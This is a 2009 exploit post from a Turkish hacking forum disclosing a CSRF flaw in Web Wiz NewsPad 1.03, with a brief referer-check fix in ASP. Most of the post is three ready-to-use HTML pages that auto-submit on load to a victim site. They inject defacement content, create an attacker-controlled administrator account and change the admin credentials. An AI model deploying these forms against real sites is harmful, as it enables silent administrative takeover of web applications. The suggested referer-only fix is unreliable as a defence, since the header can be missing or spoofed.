ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> Web Wiz NewsPad ~ XSRF
Web Wiz NewsPad ~ XSRF | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers/Equilibrium
Date :
03.02.2009 00:35:50
#
Web Wiz NewsPad ~ XSRF
[Full Screen Display]
< ------------------- header data start ------------------- > ############################################################# # Application Name : Web Wiz NewsPad 1.03 # Vulnerable Type : XSRF # Risk : High # Infection : Uzaktan gönderilen Request istekeleri databese e islenmektedir. # Bug Fix Advice : Database e insert islemi yapilmadan önceki satira HTTP_REFERER kontrolü eklenmeli. < -- BugFix code start -- > CWBugReserachersEqu = Request.Servervariables(HTTP_REFERER) If Not CWBugReserachersEqu = yoursitename.com Then Response.Redirect Default.asp Response.End End if < -- BugFix code End -- > # author : Bug Researchers/Equilibrium ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > ’ XSRF Category Add <bOdy onload=document.frmNewForum.submit()> <form id=frmNewForum name=frmNewForum method=post action=http://victim-site.com/newspad/admin_category_details.asp?CatID=0> <input type=hidden value=new name=mode> <input type=hidden value=true name=postBack> <input maxLength=30 size=25 name=category value=Write Hacked By Attacker or Redirect code> </form> </bOdy> < ------------------------------------------------------------------------------------------------- > ’ XSRF Admin User Add <bOdy onload=document.frmChangepassword.submit()> <form id=frmChangepassword name=frmChangepassword method=post action=http://victim-site.com/newspad/admin_add_admin_user.asp> <input maxLength=15 size=15 name=name2 value=Attackerusername> </td> <input type=password maxLength=15 size=15 value=Attackerpass name=password> <input type=password maxLength=15 size=15 value=Attackerpass name=password2> <input type=hidden value=true name=postBack> </form> </bOdy> < ------------------------------------------------------------------------------------------------- > ’ XSRF Admin Change password <bOdy onload=document.frmChangepassword.submit()> <form id=frmChangepassword name=frmChangepassword method=post action=http://victim-site.com/newspad/admin_change_username.asp> <input maxLength=15 size=15 name=name2 value=Attackerusername> </td> <input type=password maxLength=15 size=15 value=Attackerpass name=password> <input type=password maxLength=15 size=15 value=Attackerpass name=password2> <input type=hidden value=true name=postBack> </form> </bOdy> < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©
